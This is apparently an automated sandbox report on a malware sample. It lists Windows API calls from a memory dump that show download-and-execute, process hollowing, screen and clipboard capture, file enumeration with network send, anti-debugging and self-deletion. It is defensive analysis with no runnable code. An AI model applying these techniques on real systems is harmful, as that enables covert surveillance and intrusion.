            • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00441F85,?,?,?,?,004419DC,?,00000004), ref: 0044EF9A
            • _wcschr.LIBVCRUNTIME ref: 0044F02A
            • _wcschr.LIBVCRUNTIME ref: 0044F038
            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00441F85,00000000,004420A5), ref: 0044F0DB
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
            • String ID:
            • API String ID: 4212172061-0
            • Opcode ID: 2958d0d59106b2716bbf9024854ff4f325b6253e079e5f73fc6a0a954244a96d
            • Instruction ID: 651119c321e801f17dd1a7ba429a2dceeb4aa1bed9d5f8a21b6634afb1069130
            • Opcode Fuzzy Hash: 2958d0d59106b2716bbf9024854ff4f325b6253e079e5f73fc6a0a954244a96d
            • Instruction Fuzzy Hash: 8E61E935600606AAFB24AB36DC46BB773A8FF44714F14047FF905D7282EB78E9488769
            APIs
            • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004064D2
            • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004065B6
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: DownloadExecuteFileShell
            • String ID: open
            • API String ID: 2825088817-2758837156
            • Opcode ID: 1ef1fcb5ee927166ed2bf606d15835eaf54d5e513457301e62ecff7219cb06ab
            • Instruction ID: de45ecf938be0b84f02b1b366aeabb591a3e89dbb22835c7232af05a142efef6
            • Opcode Fuzzy Hash: 1ef1fcb5ee927166ed2bf606d15835eaf54d5e513457301e62ecff7219cb06ab
            • Instruction Fuzzy Hash: 6F61D331A0430167CA14FB75D8A697E77A99F81708F00093FFD42772D6EE3D8A09869B
            APIs
              • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
              • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
              • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
              • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
              • Part of subcall function 00445725: _free.LIBCMT ref: 00445784
              • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 00445791
            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F2F7
            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F348
            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F408
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: ErrorInfoLastLocale$_free$_abort
            • String ID:
            • API String ID: 2829624132-0
            • Opcode ID: 5d155598132bf3b03d9715496123f76655355fd2299683488a64446915391091
            • Instruction ID: 12c224c4da0c85949021a4ccaa6d586ab513ef91610cb16151a2099a543b2454
            • Opcode Fuzzy Hash: 5d155598132bf3b03d9715496123f76655355fd2299683488a64446915391091
            • Instruction Fuzzy Hash: 49617D71600207ABEB289F25CC82B7B77A8EF14314F1041BBED06C6685EB78D949DB58
            APIs
            • IsDebuggerPresent.KERNEL32 ref: 004399A4
            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004399AE
            • UnhandledExceptionFilter.KERNEL32(?), ref: 004399BB
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: ExceptionFilterUnhandled$DebuggerPresent
            • String ID:
            • API String ID: 3906539128-0
            • Opcode ID: a2edd11b745fd0db19ae8b75a4dca2fd63e5a3b0d4ecfa6da1b026d4ab375051
            • Instruction ID: 77e6618fa9d19f9c50586940e2a7469f5a9d54f298177c93e0bbf68cc30459b4
            • Opcode Fuzzy Hash: a2edd11b745fd0db19ae8b75a4dca2fd63e5a3b0d4ecfa6da1b026d4ab375051
            • Instruction Fuzzy Hash: 1D31D67591122C9BCB21DF65D9897CDB7B8BF08310F5051EAE40CA72A1E7749F858F48
            APIs
            • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00431274,00000034,?,?,00000000), ref: 004315FE
            • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00431307,00000000,?,00000000), ref: 00431614
            • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,00431307,00000000,?,00000000,0041C006), ref: 00431626
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Crypt$Context$AcquireRandomRelease
            • String ID:
            • API String ID: 1815803762-0
            • Opcode ID: 490f37dff30391dd88b2b348f1e17f82ee14bc365aa64bdd7ac48a14519942bc
            • Instruction ID: e2f248fbd61bea3c509e9dcbc4a9d000159a3c4e1760f154dd59208f6820a057
            • Opcode Fuzzy Hash: 490f37dff30391dd88b2b348f1e17f82ee14bc365aa64bdd7ac48a14519942bc
            • Instruction Fuzzy Hash: FDE0923130C310BBEB304F51AC09F172A55EB8DB72FA5063AF112E50F4D6518801855C
            APIs
            • OpenClipboard.USER32(00000000), ref: 0040A65D
            • GetClipboardData.USER32(0000000D), ref: 0040A669
            • CloseClipboard.USER32 ref: 0040A671
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Clipboard$CloseDataOpen
            • String ID:
            • API String ID: 2058664381-0
            • Opcode ID: edb8c36ac275bb67b795d66d8e1b797ea5e31e94c4ba3ac6c333071066a6c16d
            • Instruction ID: 184f8b84181a4a50bd43ef3289a1c1a9f5b779335cc527adffbe090e77bee848
            • Opcode Fuzzy Hash: edb8c36ac275bb67b795d66d8e1b797ea5e31e94c4ba3ac6c333071066a6c16d
            • Instruction Fuzzy Hash: 6CE08C3064432097D2206F60EC08B8A66649B50B12F064A7AB849AB2D1DA75DC208AAE
            APIs
            • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 004329F3
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: FeaturePresentProcessor
            • String ID:
            • API String ID: 2325560087-3916222277
            • Opcode ID: 6bf946e24e0cf3f7143bf6f7c2898541fb51292b7eeb3b4358a3a41aa26ebfb9
            • Instruction ID: 4a1c44cf8a386737ece403ae0cfd22a47b20ce31fd9c2d8f3958115f99bf9d9d
            • Opcode Fuzzy Hash: 6bf946e24e0cf3f7143bf6f7c2898541fb51292b7eeb3b4358a3a41aa26ebfb9
            • Instruction Fuzzy Hash: E4514A719002099BDB24CFAAD98579ABBF4FF48314F14846BD815EB350E3B9A910CFA5
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID: .
            • API String ID: 0-248832578
            • Opcode ID: 2bd3453bf6b0042b978c63341e7d52c868cd539d71c5d82670adc25c3f96db7e
            • Instruction ID: 24926096c943187a016d953fe808ce2acf1242cb654f72e39a34338bfc4b4f1c
            • Opcode Fuzzy Hash: 2bd3453bf6b0042b978c63341e7d52c868cd539d71c5d82670adc25c3f96db7e
            • Instruction Fuzzy Hash: 0E3108719002486FEB248E79CC84EEB7BBDDB45304F14419EF858D7251EB34EE418B94
            APIs
            • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004419DC,?,00000004), ref: 00445E6F
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: InfoLocale
            • String ID: GetLocaleInfoEx
            • API String ID: 2299586839-2904428671
            • Opcode ID: 020099d0525865bb6834e28ad9152f433c6e4676045ed3ecc95ad7b7c68cac6a
            • Instruction ID: a9bb3d2992a9d1fe8e60343c55b6d981a628f421e7cf107d295b861f9edee2c3
            • Opcode Fuzzy Hash: 020099d0525865bb6834e28ad9152f433c6e4676045ed3ecc95ad7b7c68cac6a
            • Instruction Fuzzy Hash: 6DF0F631600708BBDF016F619C05F6E7B51EB14721F10401BFC051A253CA758D109A9D
            APIs
            • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 004068E8
            • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 004069B0
              • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: FileFind$FirstNextsend
            • String ID:
            • API String ID: 4113138495-0
            • Opcode ID: e3ef31e205124b2d37ce34f80ed01c56440b36d419931c260197812f3169fbb8
            • Instruction ID: f886cb8170a1cbefaa312452e39d18d6cd017e90ab843946bfd6f4b2f28fefe7
            • Opcode Fuzzy Hash: e3ef31e205124b2d37ce34f80ed01c56440b36d419931c260197812f3169fbb8
            • Instruction Fuzzy Hash: 9C218F711043015BC314FBA1DC96CEFB7ACAF91358F400A3EF596621E1EF389A09CA5A
            APIs
              • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
              • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
              • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
              • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
              • Part of subcall function 00445725: _free.LIBCMT ref: 00445784
              • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 00445791
            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F547
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: ErrorLast$_free$InfoLocale_abort
            • String ID:
            • API String ID: 1663032902-0
            • Opcode ID: ad0e0b7788e936bcfdd9e0a2c8ea1aecabb77b710f5984c66624a7eb150c0fcd
            • Instruction ID: 815750de5804ab4a8f75770bcc990d44dba9c2967eca50803adc2dd3443e40da
            • Opcode Fuzzy Hash: ad0e0b7788e936bcfdd9e0a2c8ea1aecabb77b710f5984c66624a7eb150c0fcd
            • Instruction Fuzzy Hash: 6421B372901206BBEF249F26DC45A7A73A8EB04315F10017BFD01C6242EB78AD59CB59
            APIs
              • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
              • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
              • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
              • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
            • EnumSystemLocalesW.KERNEL32(0044F2A3,00000001,00000000,?,00441F7E,?,0044F8D0,00000000,?,?,?), ref: 0044F1ED
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: ErrorLast$EnumLocalesSystem_abort_free
            • String ID:
            • API String ID: 1084509184-0
            • Opcode ID: 1e67477eb4f1d9c825940ef83573ecb2aed64948dc5e5734fb002b4aa87f20f9
            • Instruction ID: fc4c71b657a69648ba6c32e8c27400de65702582941300ca2eca7bc8fd592fd6
            • Opcode Fuzzy Hash: 1e67477eb4f1d9c825940ef83573ecb2aed64948dc5e5734fb002b4aa87f20f9
            • Instruction Fuzzy Hash: D811293B6007019FEB189F39D89167BBB91FF80358B14443DE94647B40D776A946C744
            APIs
              • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
              • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
              • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
              • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
            • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0044F4C1,00000000,00000000,?), ref: 0044F74F
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: ErrorLast$InfoLocale_abort_free
            • String ID:
            • API String ID: 2692324296-0
            • Opcode ID: c5ca8868f81a5dafb3fdb259ff2b8ec3965b2bfb8aabdce9695f87c3ae70661f
            • Instruction ID: e4b95bc4a5e1061338a04706472302caa06a68982d3ebb8569a44a178f9f49d5
            • Opcode Fuzzy Hash: c5ca8868f81a5dafb3fdb259ff2b8ec3965b2bfb8aabdce9695f87c3ae70661f
            • Instruction Fuzzy Hash: 09F02D36600516BBFB245B65DC05BBB7768EF40764F05447AEC19A3240EA7CFD05C6D4
            APIs
              • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
              • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
              • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
              • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
            • EnumSystemLocalesW.KERNEL32(0044F4F3,00000001,?,?,00441F7E,?,0044F894,00441F7E,?,?,?,?,?,00441F7E,?,?), ref: 0044F262
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: ErrorLast$EnumLocalesSystem_abort_free
            • String ID:
            • API String ID: 1084509184-0
            • Opcode ID: d9e72da5ca64d0dbd4f9725887adba7bc59a573407832ad1990d17eaaac4c4d9
            • Instruction ID: 7c38563944de2097393583401858843e6c2e12a799e64e453201a09b71e8bce8
            • Opcode Fuzzy Hash: d9e72da5ca64d0dbd4f9725887adba7bc59a573407832ad1990d17eaaac4c4d9
            • Instruction Fuzzy Hash: 44F0223A2007045FEB145F399881A7B7B94FF8036CB15447EF9458B690DAB6AC068614
            APIs
            • GetUserNameW.ADVAPI32(?,00000010), ref: 0041962D
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: NameUser
            • String ID:
            • API String ID: 2645101109-0
            • Opcode ID: 8951ed9e5e96f4eef37346a31dc1e1cfc055faec67558bb1b1f4eabc83ab8062
            • Instruction ID: 5ca8c18713c22ae7facf93a828c8627c995cdb1c7496207664ac88b3b4335c79
            • Opcode Fuzzy Hash: 8951ed9e5e96f4eef37346a31dc1e1cfc055faec67558bb1b1f4eabc83ab8062
            • Instruction Fuzzy Hash: 7C01FF7290011CABCB04EBD5DC45EDEB7BCEF44319F10016AB505B61A5EEB46A89CB98
            APIs
              • Part of subcall function 00442D9A: EnterCriticalSection.KERNEL32(?,?,004404DB,00000000,0046B4D8,0000000C,00440496,?,?,?,00443038,?,?,004457DA,00000001,00000364), ref: 00442DA9
            • EnumSystemLocalesW.KERNEL32(004458CE,00000001,0046B680,0000000C), ref: 0044594C
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: CriticalEnterEnumLocalesSectionSystem
            • String ID:
            • API String ID: 1272433827-0
            • Opcode ID: 9f071f7aa8f2d5cfdb4dd86670e259d2fa7dae68b4529c3cbc217272811744e5
            • Instruction ID: 57fcd2d1ba6fdacad71b84952267562ddc6b8062f8818d57533dd41bf3368d71
            • Opcode Fuzzy Hash: 9f071f7aa8f2d5cfdb4dd86670e259d2fa7dae68b4529c3cbc217272811744e5
            • Instruction Fuzzy Hash: CFF03C72A10700EFEB00EF69D846B5D77F0EB08325F10402AF400DB2A2DAB989448B5E
            APIs
              • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
              • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
              • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
              • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
            • EnumSystemLocalesW.KERNEL32(0044F087,00000001,?,?,?,0044F8F2,00441F7E,?,?,?,?,?,00441F7E,?,?,?), ref: 0044F167
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: ErrorLast$EnumLocalesSystem_abort_free
            • String ID:
            • API String ID: 1084509184-0
            • Opcode ID: 27fc750af04bae75093f47f6c8e3f33632e5f31a47d704513601fd173c54c35f
            • Instruction ID: 407cbbfb1d6a14fdc0c4ba4a8479f65f1c0a46e2fba7f2f7bc53bc9e3406d240
            • Opcode Fuzzy Hash: 27fc750af04bae75093f47f6c8e3f33632e5f31a47d704513601fd173c54c35f
            • Instruction Fuzzy Hash: 22F05C3930020597DB049F35D845A7ABFA0EFC1754F060069EA058B651C6359C46C754
            APIs
            • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00413F34,00471E78,00472910,00471E78,00000000,00471E78,00000000,00471E78,3.8.0 Pro), ref: 0040E2CF
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: InfoLocale
            • String ID:
            • API String ID: 2299586839-0
            • Opcode ID: 856777f14b9a4662401ba442cf494b6ebb80c668ca2d98772b8c18b49fbcc60a
            • Instruction ID: e43a985d938ffd5d313bbeec62feab64fa47c80c67ee5e1720aa7bcbe65aeca7
            • Opcode Fuzzy Hash: 856777f14b9a4662401ba442cf494b6ebb80c668ca2d98772b8c18b49fbcc60a
            • Instruction Fuzzy Hash: 65D05E30B4421C7BEA10D6859C0AEAA7B9CD701B62F0001A6BA08D72D0E9E1AE0487E6
            APIs
            • SetUnhandledExceptionFilter.KERNEL32(Function_00032908,0043262F), ref: 00432901
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: ExceptionFilterUnhandled
            • String ID:
            • API String ID: 3192549508-0
            • Opcode ID: 937b0859e2ecbaa4ed0ef4ac8f36e04938c9481000da7c0a06be09f57d080333
            • Instruction ID: aee9a4537fe14d989eba5338f3e0e07ed20d0bd3150f914eab3e23255f36ef43
            • Opcode Fuzzy Hash: 937b0859e2ecbaa4ed0ef4ac8f36e04938c9481000da7c0a06be09f57d080333
            • Instruction Fuzzy Hash:
            APIs
            • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00416474
            • GetProcAddress.KERNEL32(00000000), ref: 00416477
            • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00416488
            • GetProcAddress.KERNEL32(00000000), ref: 0041648B
            • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041649C
            • GetProcAddress.KERNEL32(00000000), ref: 0041649F
            • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004164B0
            • GetProcAddress.KERNEL32(00000000), ref: 004164B3
            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00416555
            • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041656D
            • GetThreadContext.KERNEL32(?,00000000), ref: 00416583
            • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004165A9
            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041662B
            • TerminateProcess.KERNEL32(?,00000000), ref: 0041663F
            • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041667F
            • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00416749
            • SetThreadContext.KERNEL32(?,00000000), ref: 00416766
            • ResumeThread.KERNEL32(?), ref: 00416773
            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041678A
            • GetCurrentProcess.KERNEL32(?), ref: 00416795
            • TerminateProcess.KERNEL32(?,00000000), ref: 004167B0
            • GetLastError.KERNEL32 ref: 004167B8
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
            • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$`#v$ntdll
            • API String ID: 4188446516-108836778
            • Opcode ID: 5b7e1e0f0ab70bb274c8e1cba5061de31cdd1b1bc4dd29beedf5b9f83fbb8038
            • Instruction ID: 94204e0ceb90eb3d518cc699b6b418d02f123724867831e7a48fec904b930286
            • Opcode Fuzzy Hash: 5b7e1e0f0ab70bb274c8e1cba5061de31cdd1b1bc4dd29beedf5b9f83fbb8038
            • Instruction Fuzzy Hash: 9CA18E71604300AFDB109F64DC85F6B7BE8FB48749F00092AF695D62A1E7B8EC44CB5A
            APIs
            • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00416E98
            • CreateCompatibleDC.GDI32(00000000), ref: 00416EA5
              • Part of subcall function 004172DF: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 0041730F
            • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00416F1B
            • DeleteDC.GDI32(00000000), ref: 00416F32
            • DeleteDC.GDI32(00000000), ref: 00416F35
            • DeleteObject.GDI32(00000000), ref: 00416F38
            • SelectObject.GDI32(00000000,00000000), ref: 00416F59
            • DeleteDC.GDI32(00000000), ref: 00416F6A
            • DeleteDC.GDI32(00000000), ref: 00416F6D
            • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00416F91
            • GetIconInfo.USER32(?,?), ref: 00416FC5
            • DeleteObject.GDI32(?), ref: 00416FF4
            • DeleteObject.GDI32(?), ref: 00417001
            • DrawIcon.USER32(00000000,?,?,?), ref: 0041700E
            • GetObjectA.GDI32(00000000,00000018,?), ref: 00417026
            • LocalAlloc.KERNEL32(00000040,00000001), ref: 00417095
            • GlobalAlloc.KERNEL32(00000000,?), ref: 00417104
            • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00417128
            • DeleteDC.GDI32(?), ref: 0041713C
            • DeleteDC.GDI32(00000000), ref: 0041713F
            • DeleteObject.GDI32(00000000), ref: 00417142
            • GlobalFree.KERNEL32(?), ref: 0041714D
            • DeleteObject.GDI32(00000000), ref: 00417201
            • GlobalFree.KERNEL32(?), ref: 00417208
            • DeleteDC.GDI32(?), ref: 00417218
            • DeleteDC.GDI32(00000000), ref: 00417223
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
            • String ID: DISPLAY
            • API String ID: 479521175-865373369
            • Opcode ID: 1a3d4f3de887f4170ad339b02c00c27acc1d1d199adb59c50c414d62b5943ebe
            • Instruction ID: 4ba325f74191387ade15767708145f982ef5b1c7ca4df498548f130554e7309d
            • Opcode Fuzzy Hash: 1a3d4f3de887f4170ad339b02c00c27acc1d1d199adb59c50c414d62b5943ebe
            • Instruction Fuzzy Hash: 6FB16A315083009FD720DF24DC44BABBBE9EF88755F41482EF98993291DB38E945CB5A
            APIs
              • Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,?,0040C3C8), ref: 004112C5
              • Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF,?,0040C3C8), ref: 004112D8
            • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C0D6
            • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C0E9
            • SetFileAttributesW.KERNEL32(?,00000080), ref: 0040C102
            • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040C132
              • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(00409305,00000000,004721E8,0040BC76,?,00472200,pth_unenc,004721E8), ref: 0040A801
              • Part of subcall function 0040A7F2: UnhookWindowsHookEx.USER32(?), ref: 0040A811
              • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(004092EF,00000000,?,00472200,pth_unenc,004721E8), ref: 0040A823
              • Part of subcall function 0041A17B: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041A29A,00000000,00000000,00000000), ref: 0041A1BA
            • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040C37D
            • ExitProcess.KERNEL32 ref: 0040C389
            Strings
            Memory Dump Source
            • Source File: 0000000E.00000002.2151213189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_14_2_400000_bmkNCLNkqvOpVZ.jbxd
            Yara matches
            Similarity
            • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
